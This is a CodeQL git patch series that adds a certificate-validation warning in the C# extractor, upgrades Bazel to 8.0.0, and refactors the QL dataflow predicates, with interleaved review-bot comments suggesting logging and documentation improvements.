diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 9a366d86f62..17547a0ec87 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -606,6 +606,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { if (chain is null || cert is null) { + logger.LogWarning("Certificate validation trivially failed due to missing chain or certificate."); return false; } chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; From 53ca5083a912e20358f5e1f1c995d347c8526c65 Mon Sep 17 00:00:00 2001 From: Cornelius Riemenschneider Date: Tue, 10 Dec 2024 11:47:45 +0100 Subject: [PATCH 0968/1267] Upgrade bazel to 8.0.0. Previously, we were using 8.0.0rc1. In particular, this upgrade means we need to explicitly import more rules, as they've been moved out of the core bazel repo. --- .bazelrc | 8 ++++++++ .bazelversion | 2 +- MODULE.bazel | 9 +++++---- csharp/scripts/BUILD.bazel | 2 ++ go/BUILD.bazel | 1 + java/kotlin-extractor/BUILD.bazel | 1 + misc/bazel/BUILD.bazel | 2 ++ misc/codegen/BUILD.bazel | 2 ++ misc/codegen/generators/BUILD.bazel | 2 ++ misc/codegen/lib/BUILD.bazel | 1 + misc/codegen/loaders/BUILD.bazel | 1 + misc/codegen/test/BUILD.bazel | 1 + misc/ripunzip/BUILD.bazel | 2 ++ python/extractor/BUILD.bazel | 1 + rust/codegen/BUILD.bazel | 1 + swift/extractor/BUILD.bazel | 1 + swift/logging/tests/assertion-diagnostics/BUILD.bazel | 1 + swift/ql/integration-tests/BUILD.bazel | 2 ++ swift/swift-autobuilder/tests/BUILD.bazel | 2 ++ swift/third_party/resource-dir/BUILD.bazel | 2 ++ swift/tools/BUILD.bazel | 1 + swift/tools/test/qltest/BUILD.bazel | 2 ++ 22 files changed, 42 insertions(+), 5 deletions(-) diff --git a/.bazelrc b/.bazelrc index 60455dd72c6..40beef6eecc 100644 --- a/.bazelrc 
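Review bot: The new warning does not say which request was rejected, so a failed validation is hard to trace from the log alone. Consider including the target host, e.g. `logger.LogWarning($"Certificate validation trivially failed for {message.RequestUri?.Host} due to missing chain or certificate.");`. Log only the host rather than the full URI, since feed URLs can carry credentials. `message` is the lambda's first parameter, declared outside this hunk.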
+++ b/.bazelrc @@ -24,4 +24,12 @@ common --registry=https://bcr.bazel.build common --@rules_dotnet//dotnet/settings:strict_deps=false +# Reduce this eventually to empty, once we've fixed all our usages of java, and https://github.com/bazel-contrib/rules_go/issues/4193 is fixed +common --incompatible_autoload_externally="+@rules_java,+@rules_shell" + +build --java_language_version=17 +build --tool_java_language_version=17 +build --tool_java_runtime_version=remotejdk_17 +build --java_runtime_version=remotejdk_17 + try-import %workspace%/local.bazelrc diff --git a/.bazelversion b/.bazelversion index 5ce91d4d61c..ae9a76b9249 100644 --- a/.bazelversion +++ b/.bazelversion @@ -1 +1 @@ -8.0.0rc1 +8.0.0 diff --git a/MODULE.bazel b/MODULE.bazel index 08a4aaa78af..d2ae279af60 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -15,16 +15,17 @@ local_path_override( # see https://registry.bazel.build/ for a list of available packages bazel_dep(name = "platforms", version = "0.0.10") -bazel_dep(name = "rules_go", version = "0.50.0") +bazel_dep(name = "rules_go", version = "0.50.1") bazel_dep(name = "rules_pkg", version = "1.0.1") bazel_dep(name = "rules_nodejs", version = "6.2.0-codeql.1") -bazel_dep(name = "rules_python", version = "0.36.0") +bazel_dep(name = "rules_python", version = "0.40.0") +bazel_dep(name = "rules_shell", version = "0.3.0") bazel_dep(name = "bazel_skylib", version = "1.7.1") -bazel_dep(name = "abseil-cpp", version = "20240116.0", repo_name = "absl") +bazel_dep(name = "abseil-cpp", version = "20240116.1", repo_name = "absl") bazel_dep(name = "nlohmann_json", version = "3.11.3", repo_name = "json") bazel_dep(name = "fmt", version = "10.0.0") bazel_dep(name = "rules_kotlin", version = "2.0.0-codeql.1") -bazel_dep(name = "gazelle", version = "0.38.0") +bazel_dep(name = "gazelle", version = "0.40.0") bazel_dep(name = "rules_dotnet", version = "0.17.4") bazel_dep(name = "googletest", version = "1.14.0.bcr.1") bazel_dep(name = "rules_rust", version = "0.52.2") 
diff --git a/csharp/scripts/BUILD.bazel b/csharp/scripts/BUILD.bazel index c4b44ac28ac..8f4f239104e 100644 --- a/csharp/scripts/BUILD.bazel +++ b/csharp/scripts/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_binary") + py_binary( name = "gen-git-assembly-info", srcs = ["gen-git-assembly-info.py"], diff --git a/go/BUILD.bazel b/go/BUILD.bazel index 931f061da9e..d73e7ba1a6f 100644 --- a/go/BUILD.bazel +++ b/go/BUILD.bazel @@ -1,5 +1,6 @@ load("@gazelle//:def.bzl", "gazelle") load("@rules_pkg//pkg:mappings.bzl", "pkg_files") +load("@rules_python//python:defs.bzl", "py_binary") load("//misc/bazel:pkg.bzl", "codeql_pack", "codeql_pkg_files") gazelle( diff --git a/java/kotlin-extractor/BUILD.bazel b/java/kotlin-extractor/BUILD.bazel index f95661f8128..575b9788e8c 100644 --- a/java/kotlin-extractor/BUILD.bazel +++ b/java/kotlin-extractor/BUILD.bazel @@ -40,6 +40,7 @@ load( ) load("@rules_kotlin//kotlin:core.bzl", "kt_javac_options", "kt_kotlinc_options") load("@rules_kotlin//kotlin:jvm.bzl", "kt_jvm_library") +load("@rules_python//python:defs.bzl", "py_binary") package(default_visibility = ["//java/kotlin-extractor:__subpackages__"]) diff --git a/misc/bazel/BUILD.bazel b/misc/bazel/BUILD.bazel index c3670b75c94..e00a6f7a64c 100644 --- a/misc/bazel/BUILD.bazel +++ b/misc/bazel/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_shell//shell:sh_library.bzl", "sh_library") + sh_library( name = "sh_runfiles", srcs = ["runfiles.sh"], diff --git a/misc/codegen/BUILD.bazel b/misc/codegen/BUILD.bazel index 52a5c001134..c7b88de96b7 100644 --- a/misc/codegen/BUILD.bazel +++ b/misc/codegen/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_binary") + py_binary( name = "codegen", srcs = ["codegen.py"], diff --git a/misc/codegen/generators/BUILD.bazel b/misc/codegen/generators/BUILD.bazel index f731c42ce23..df89a2ac507 100644 --- a/misc/codegen/generators/BUILD.bazel +++ b/misc/codegen/generators/BUILD.bazel 
@@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_library") + py_library( name = "generators", srcs = glob(["*.py"]), diff --git a/misc/codegen/lib/BUILD.bazel b/misc/codegen/lib/BUILD.bazel index 482d1ac178f..a68840beca3 100644 --- a/misc/codegen/lib/BUILD.bazel +++ b/misc/codegen/lib/BUILD.bazel @@ -1,4 +1,5 @@ load("@codegen_deps//:requirements.bzl", "requirement") +load("@rules_python//python:defs.bzl", "py_library") py_library( name = "lib", diff --git a/misc/codegen/loaders/BUILD.bazel b/misc/codegen/loaders/BUILD.bazel index be07c6d884b..7e7a5ec8acc 100644 --- a/misc/codegen/loaders/BUILD.bazel +++ b/misc/codegen/loaders/BUILD.bazel @@ -1,4 +1,5 @@ load("@codegen_deps//:requirements.bzl", "requirement") +load("@rules_python//python:defs.bzl", "py_library") py_library( name = "loaders", diff --git a/misc/codegen/test/BUILD.bazel b/misc/codegen/test/BUILD.bazel index dde67283335..d8c06175785 100644 --- a/misc/codegen/test/BUILD.bazel +++ b/misc/codegen/test/BUILD.bazel @@ -1,4 +1,5 @@ load("@codegen_deps//:requirements.bzl", "requirement") +load("@rules_python//python:defs.bzl", "py_library", "py_test") py_library( name = "utils", diff --git a/misc/ripunzip/BUILD.bazel b/misc/ripunzip/BUILD.bazel index ea21e6b1c94..6575b692772 100644 --- a/misc/ripunzip/BUILD.bazel +++ b/misc/ripunzip/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") + alias( name = "ripunzip", actual = select({"@platforms//os:" + os: "@ripunzip-" + os for os in ("linux", "windows", "macos")}), diff --git a/python/extractor/BUILD.bazel b/python/extractor/BUILD.bazel index eabaee519ea..77025503fe6 100644 --- a/python/extractor/BUILD.bazel +++ b/python/extractor/BUILD.bazel @@ -1,3 +1,4 @@ +load("@rules_python//python:defs.bzl", "py_binary") load("//misc/bazel:pkg.bzl", "codeql_pkg_files", "strip_prefix") py_binary( diff --git a/rust/codegen/BUILD.bazel b/rust/codegen/BUILD.bazel index fbac3d04619..37118ca8777 100644 --- a/rust/codegen/BUILD.bazel 
+++ b/rust/codegen/BUILD.bazel @@ -1,4 +1,5 @@ load("@bazel_skylib//rules:native_binary.bzl", "native_binary") +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") _args = [ "//rust/ast-generator", diff --git a/swift/extractor/BUILD.bazel b/swift/extractor/BUILD.bazel index 8290aec4121..342125c9d4f 100644 --- a/swift/extractor/BUILD.bazel +++ b/swift/extractor/BUILD.bazel @@ -1,3 +1,4 @@ +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") load("//misc/bazel:pkg.bzl", "codeql_pkg_runfiles") load("//swift:rules.bzl", "swift_cc_binary") diff --git a/swift/logging/tests/assertion-diagnostics/BUILD.bazel b/swift/logging/tests/assertion-diagnostics/BUILD.bazel index 86fbbbee7c7..c01a91fafd4 100644 --- a/swift/logging/tests/assertion-diagnostics/BUILD.bazel +++ b/swift/logging/tests/assertion-diagnostics/BUILD.bazel @@ -1,3 +1,4 @@ +load("@rules_python//python:defs.bzl", "py_test") load("//swift:rules.bzl", "swift_cc_binary") swift_cc_binary( diff --git a/swift/ql/integration-tests/BUILD.bazel b/swift/ql/integration-tests/BUILD.bazel index 3c376593c4a..352170c4cef 100644 --- a/swift/ql/integration-tests/BUILD.bazel +++ b/swift/ql/integration-tests/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_library") + py_library( name = "utils", srcs = [ diff --git a/swift/swift-autobuilder/tests/BUILD.bazel b/swift/swift-autobuilder/tests/BUILD.bazel index f9a2b8eb178..507899cf445 100644 --- a/swift/swift-autobuilder/tests/BUILD.bazel +++ b/swift/swift-autobuilder/tests/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_test") + [ py_test( name = test_dir + "-test", diff --git a/swift/third_party/resource-dir/BUILD.bazel b/swift/third_party/resource-dir/BUILD.bazel index 9cea2efd029..b48be643b69 100644 --- a/swift/third_party/resource-dir/BUILD.bazel +++ b/swift/third_party/resource-dir/BUILD.bazel 
@@ -1,3 +1,5 @@ +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") + alias( name = "resource-dir", actual = select({"@platforms//os:" + os: "@swift-resource-dir-" + os for os in ("linux", "macos")}), diff --git a/swift/tools/BUILD.bazel b/swift/tools/BUILD.bazel index 777b9649068..0c59e2571e5 100644 --- a/swift/tools/BUILD.bazel +++ b/swift/tools/BUILD.bazel @@ -1,3 +1,4 @@ +load("@rules_shell//shell:sh_binary.bzl", "sh_binary") load("//misc/bazel:pkg.bzl", "codeql_pkg_files") sh_binary( diff --git a/swift/tools/test/qltest/BUILD.bazel b/swift/tools/test/qltest/BUILD.bazel index f16563eb21d..c8a9b80364d 100644 --- a/swift/tools/test/qltest/BUILD.bazel +++ b/swift/tools/test/qltest/BUILD.bazel @@ -1,3 +1,5 @@ +load("@rules_python//python:defs.bzl", "py_library", "py_test") + py_library( name = "utils", srcs = ["utils.py"], From c8046fa8e0fcb2caff7422bc5e0d2a82ec0d01c0 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 11:25:27 +0100 Subject: [PATCH 0969/1267] Dataflow: Drop some ApApprox columns and joins. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 113 ++++++++---------- 1 file changed, 48 insertions(+), 65 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 313934378c6..635e8e24aee 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -942,11 +942,9 @@ module MakeImpl Lang> { } pragma[nomagic] - predicate returnMayFlowThrough(RetNodeEx ret, Ap argAp, Ap ap, ReturnKindExt kind) { + predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind) { throughFlowNodeCand(ret) and - kind = ret.getKind() and - exists(argAp) and - exists(ap) + kind = ret.getKind() } pragma[nomagic] 
@@ -969,11 +967,10 @@ module MakeImpl Lang> { predicate callEdgeReturn( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, ReturnKindExt kind, NodeEx out, - boolean allowsFieldFlow, Ap ap + boolean allowsFieldFlow ) { flowOutOfCallNodeCand1(call, ret, kind, out, allowsFieldFlow) and - c = ret.getEnclosingCallable() and - exists(ap) + c = ret.getEnclosingCallable() } predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c) { @@ -981,7 +978,7 @@ module MakeImpl Lang> { } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { - callEdgeReturn(call, c, _, _, _, _, _) + callEdgeReturn(call, c, _, _, _, _) } additional predicate stats( @@ -1004,7 +1001,7 @@ module MakeImpl Lang> { calledges = count(DataFlowCall call, DataFlowCallable c | callEdgeArgParam(call, c, _, _, _, _) or - callEdgeReturn(call, c, _, _, _, _, _) + callEdgeReturn(call, c, _, _, _, _) ) } /* End: Stage 1 logic. */ @@ -1287,7 +1284,7 @@ module MakeImpl Lang> { predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap); - predicate returnMayFlowThrough(RetNodeEx ret, Ap argAp, Ap ap, ReturnKindExt kind); + predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind); predicate storeStepCand( NodeEx node1, Ap ap1, Content c, NodeEx node2, DataFlowType contentType, @@ -1303,7 +1300,7 @@ module MakeImpl Lang> { predicate callEdgeReturn( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, ReturnKindExt kind, NodeEx out, - boolean allowsFieldFlow, Ap ap + boolean allowsFieldFlow ); predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c); 
@@ -1437,13 +1434,12 @@ module MakeImpl Lang> { pragma[nomagic] private predicate flowThroughOutOfCall( - DataFlowCall call, CcCall ccc, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow, - ApApprox argApa, ApApprox apa + DataFlowCall call, CcCall ccc, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow ) { exists(ReturnKindExt kind | - PrevStage::callEdgeReturn(call, _, ret, kind, out, allowsFieldFlow, apa) and + PrevStage::callEdgeReturn(call, _, ret, kind, out, allowsFieldFlow) and PrevStage::callMayFlowThroughRev(call) and - PrevStage::returnMayFlowThrough(ret, argApa, apa, kind) and + PrevStage::returnMayFlowThrough(ret, kind) and matchesCall(ccc, call) ) } @@ -1560,12 +1556,9 @@ module MakeImpl Lang> { fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, apa, stored) or // flow through a callable - exists( - DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow, - ApApprox innerArgApa - | - fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, innerArgApa) and - flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow, innerArgApa, apa) and + exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | + fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _) and + flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) @@ -1925,7 +1918,7 @@ module MakeImpl Lang> { DataFlowCallable c, CcNoCall ctx ) { result = viableImplCallContextReducedReverse(c, ctx) and - PrevStage::callEdgeReturn(result, c, _, _, _, _, _) + PrevStage::callEdgeReturn(result, c, _, _, _, _) } bindingset[c, ctx] 
@@ -1939,21 +1932,20 @@ module MakeImpl Lang> { bindingset[call] pragma[inline_late] private predicate flowOutOfCallApaInlineLate( - DataFlowCall call, DataFlowCallable c, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow, - ApApprox apa + DataFlowCall call, DataFlowCallable c, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow ) { - PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow, apa) + PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow) } - bindingset[c, ret, apa, innercc] + bindingset[c, ret, innercc] pragma[inline_late] pragma[noopt] private predicate flowOutOfCallApaNotCallContextReduced( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, NodeEx out, boolean allowsFieldFlow, - ApApprox apa, CcNoCall innercc + CcNoCall innercc ) { viableImplNotCallContextReducedReverse(innercc) and - PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow, apa) + PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow) } pragma[nomagic] @@ -1975,10 +1967,9 @@ module MakeImpl Lang> { inner = ret.getEnclosingCallable() and ( call = viableImplCallContextReducedReverseInlineLate(inner, innercc) and - flowOutOfCallApaInlineLate(call, inner, ret, out, allowsFieldFlow, apa) + flowOutOfCallApaInlineLate(call, inner, ret, out, allowsFieldFlow) or - flowOutOfCallApaNotCallContextReduced(call, inner, ret, out, allowsFieldFlow, apa, - innercc) + flowOutOfCallApaNotCallContextReduced(call, inner, ret, out, allowsFieldFlow, innercc) ) } @@ -2050,10 +2041,8 @@ module MakeImpl Lang> { private predicate fwdFlow1Out( NodeEx node, FlowState state, Cc cc, Typ t0, Ap ap, TypOption stored ) { - exists(ApApprox apa | - fwdFlow1(node, state, cc, _, t0, _, ap, apa, stored) and - PrevStage::callEdgeReturn(_, _, _, _, node, _, apa) - ) + fwdFlow1(node, state, cc, _, t0, _, ap, _, stored) and + PrevStage::callEdgeReturn(_, _, _, _, node, _) } pragma[nomagic] 
@@ -2097,15 +2086,14 @@ module MakeImpl Lang> { ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and - fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, - pragma[only_bind_into](apa), stored) and + fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, apa, stored) and summaryCtx = TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp), _) and not outBarrier(ret, state) and kind = ret.getKind() and parameterFlowThroughAllowed(p, kind) and argApa = getApprox(argAp) and - PrevStage::returnMayFlowThrough(ret, pragma[only_bind_into](argApa), apa, kind) + PrevStage::returnMayFlowThrough(ret, kind) ) } @@ -2178,10 +2166,10 @@ module MakeImpl Lang> { RetNodeEx ret, ReturnPosition pos, FlowState state, CcCall ccc, ParamNodeEx p, Typ argT, Ap argAp, ApApprox argApa, TypOption argStored, Ap ap ) { - exists(DataFlowCall call, ApApprox apa, boolean allowsFieldFlow | - returnFlowsThrough0(call, state, ccc, ap, apa, ret, + exists(DataFlowCall call, boolean allowsFieldFlow | + returnFlowsThrough0(call, state, ccc, ap, _, ret, TSummaryCtxSome(p, _, argT, argAp, argStored), argApa) and - flowThroughOutOfCall(call, ccc, ret, _, allowsFieldFlow, argApa, apa) and + flowThroughOutOfCall(call, ccc, ret, _, allowsFieldFlow) and pos = ret.getReturnPosition() and if allowsFieldFlow = false then ap instanceof ApNil else any() ) 
@@ -2216,14 +2204,13 @@ module MakeImpl Lang> { pragma[nomagic] private predicate flowOutOfCallAp( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, ReturnPosition pos, NodeEx out, - Ap ap + Ap ap, boolean allowsFieldFlow ) { - exists(ApApprox apa, boolean allowsFieldFlow | - PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow, apa) and - fwdFlow(ret, _, _, _, _, ap, apa, _) and - pos = ret.getReturnPosition() and - if allowsFieldFlow = false then ap instanceof ApNil else any() - | + PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow) and + fwdFlow(ret, _, _, _, _, ap, _, _) and + pos = ret.getReturnPosition() and + (if allowsFieldFlow = false then ap instanceof ApNil else any()) and + ( // both directions are needed for flow-through FwdTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) or FwdTypeFlowInput::dataFlowTakenCallEdgeOut(call, c) @@ -2356,7 +2343,7 @@ module MakeImpl Lang> { predicate enableTypeFlow = Param::enableTypeFlow/0; predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c) { - flowOutOfCallAp(call, c, _, _, _, _) + flowOutOfCallAp(call, c, _, _, _, _, _) } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { @@ -2407,7 +2394,7 @@ module MakeImpl Lang> { DataFlowCall call, RetNodeEx ret, ReturnPosition pos, NodeEx out, Ap ap, boolean cc ) { exists(DataFlowCallable c | - flowOutOfCallAp(call, c, ret, pos, out, ap) and + flowOutOfCallAp(call, c, ret, pos, out, ap, _) and RevTypeFlow::typeFlowValidEdgeIn(call, c, cc) ) } @@ -2559,8 +2546,8 @@ module MakeImpl Lang> { } pragma[nomagic] - predicate returnMayFlowThrough(RetNodeEx ret, Ap argAp, Ap ap, ReturnKindExt kind) { - exists(ParamNodeEx p, ReturnPosition pos | + predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind) { + exists(ParamNodeEx p, ReturnPosition pos, Ap argAp, Ap ap | returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, _, ap) and parameterFlowsThroughRev(p, argAp, pos, ap) and kind = pos.getKind() 
@@ -2607,14 +2594,13 @@ module MakeImpl Lang> { predicate callEdgeReturn( DataFlowCall call, DataFlowCallable c, RetNodeEx ret, ReturnKindExt kind, NodeEx out, - boolean allowsFieldFlow, Ap ap + boolean allowsFieldFlow ) { - exists(FlowState state, ReturnPosition pos | - flowOutOfCallAp(call, c, ret, pos, out, ap) and + exists(FlowState state, ReturnPosition pos, Ap ap | + flowOutOfCallAp(call, c, ret, pos, out, ap, allowsFieldFlow) and revFlow(ret, pragma[only_bind_into](state), pragma[only_bind_into](ap)) and revFlow(out, pragma[only_bind_into](state), pragma[only_bind_into](ap)) and kind = pos.getKind() and - allowsFieldFlow = true and RevTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) ) } @@ -2624,7 +2610,7 @@ module MakeImpl Lang> { } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { - callEdgeReturn(call, c, _, _, _, _, _) + callEdgeReturn(call, c, _, _, _, _) } /** Holds if `node1` can step to `node2` in one or more local steps. */ @@ -2719,7 +2705,7 @@ module MakeImpl Lang> { callEdgeArgParam(_, _, node, next, _, ap) and apNext = ap or - callEdgeReturn(_, _, node, _, next, _, ap) and + callEdgeReturn(_, _, node, _, next, _) and apNext = ap or storeStepCand(node, _, _, next, _, _) 
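Review bot: `callEdgeReturn` no longer pins `allowsFieldFlow = true`; the flag now comes out of `flowOutOfCallAp`, and `ap` has become a local existential. That is more than dropping a column: the next stage now relies on `allowsFieldFlow` alone to restrict the access path to `ApNil`, where it previously also joined on the `ap`/`apa` column. A short QLDoc comment on the predicate would make the new contract explicit, e.g. `/** Holds if the return edge is relevant; allowsFieldFlow is false when only an empty access path may flow out along it. */`. The enclosing module starts outside the hunk.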
@@ -3206,13 +3192,10 @@ module MakeImpl Lang> { PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, NodeEx node, Cc cc, FlowState state, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { - exists( - DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow, - ApApprox innerArgApa, ApApprox apa - | - fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, apa, - stored, ret, innerArgApa) and - flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow, innerArgApa, apa) and + exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | + fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, _, stored, + ret, _) and + flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) From 7c888ebe062c41026e112e92cf5ca0bfaff1314c Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 11:43:01 +0100 Subject: [PATCH 0970/1267] Dataflow: Replace some allowsFieldFlow,apa pairs with emptyAp boolean. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 142 +++++++++--------- 1 file changed, 68 insertions(+), 74 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 635e8e24aee..b3563d95861 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -931,12 +931,12 @@ module MakeImpl Lang> { * candidate for the origin of a summary. */ pragma[nomagic] - predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap) { + predicate parameterMayFlowThrough(ParamNodeEx p, boolean emptyAp) { exists(DataFlowCallable c, ReturnKindExt kind | throughFlowNodeCand(p) and returnFlowCallableNodeCand(c, kind) and p.getEnclosingCallable() = c and - exists(ap) and + emptyAp = [true, false] and parameterFlowThroughAllowed(p, kind) ) } 
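Review bot: The QLDoc above `parameterMayFlowThrough` does not cover the new `emptyAp` column, and in this stage `emptyAp = [true, false]` makes the predicate hold for both values. I would add a sentence such as `The emptyAp column records whether the access path is empty; this stage leaves it unconstrained.` The same gap applies to `callEdgeArgParam` in the following hunk, where `emptyAp = false` additionally requires `allowsFieldFlow = true`, and to the two signature declarations changed later in this patch. The comment opens outside the hunk, so its first lines are not visible here.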
@@ -957,12 +957,17 @@ module MakeImpl Lang> { } predicate callEdgeArgParam( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, - boolean allowsFieldFlow, Ap ap + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - flowIntoCallNodeCand1(call, arg, p, allowsFieldFlow) and - c = p.getEnclosingCallable() and - exists(ap) + exists(boolean allowsFieldFlow | + flowIntoCallNodeCand1(call, arg, p, allowsFieldFlow) and + c = p.getEnclosingCallable() and + ( + emptyAp = true + or + allowsFieldFlow = true and emptyAp = false + ) + ) } predicate callEdgeReturn( @@ -974,7 +979,7 @@ module MakeImpl Lang> { } predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c) { - callEdgeArgParam(call, c, _, _, _, _) + callEdgeArgParam(call, c, _, _, _) } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { @@ -1000,7 +1005,7 @@ module MakeImpl Lang> { tuples = count(NodeEx n, boolean b | revFlow(n, b)) and calledges = count(DataFlowCall call, DataFlowCallable c | - callEdgeArgParam(call, c, _, _, _, _) or + callEdgeArgParam(call, c, _, _, _) or callEdgeReturn(call, c, _, _, _, _) ) } @@ -1282,7 +1287,7 @@ module MakeImpl Lang> { predicate callMayFlowThroughRev(DataFlowCall call); - predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap); + predicate parameterMayFlowThrough(ParamNodeEx p, boolean emptyAp); predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind); @@ -1294,8 +1299,7 @@ module MakeImpl Lang> { predicate readStepCand(NodeEx n1, Content c, NodeEx n2); predicate callEdgeArgParam( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, - boolean allowsFieldFlow, Ap ap + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ); predicate callEdgeReturn( 
@@ -1732,34 +1736,19 @@ module MakeImpl Lang> { private module FwdFlowIn { pragma[nomagic] private predicate callEdgeArgParamRestricted( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp, - ApApprox apa + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - exists(boolean allowsFieldFlow | - PrevStage::callEdgeArgParam(call, c, arg, p, allowsFieldFlow, apa) - | - if - PrevStage::callMayFlowThroughRev(call) and - PrevStage::parameterMayFlowThrough(p, apa) - then - emptyAp = true and - apa instanceof PrevStage::ApNil and - flowThrough() - or - emptyAp = false and - allowsFieldFlow = true and - if allowsFieldFlowThrough(call, c) then flowThrough() else not flowThrough() - else ( - not flowThrough() and - ( - emptyAp = true and - apa instanceof PrevStage::ApNil - or - emptyAp = false and - allowsFieldFlow = true - ) - ) - ) + PrevStage::callEdgeArgParam(call, c, arg, p, emptyAp) and + if + PrevStage::callMayFlowThroughRev(call) and + PrevStage::parameterMayFlowThrough(p, emptyAp) + then + emptyAp = true and + flowThrough() + or + emptyAp = false and + if allowsFieldFlowThrough(call, c) then flowThrough() else not flowThrough() + else not flowThrough() } pragma[nomagic] @@ -1767,7 +1756,7 @@ module MakeImpl Lang> { DataFlowCall call, CcCall ctx ) { result = viableImplCallContextReduced(call, ctx) and - callEdgeArgParamRestricted(call, result, _, _, _, _) + callEdgeArgParamRestricted(call, result, _, _, _) } bindingset[call, ctx] @@ -1783,7 +1772,7 @@ module MakeImpl Lang> { private DataFlowCallable viableImplCallContextReducedInlineLate( DataFlowCall call, ArgNodeEx arg, CcCall ctx ) { - 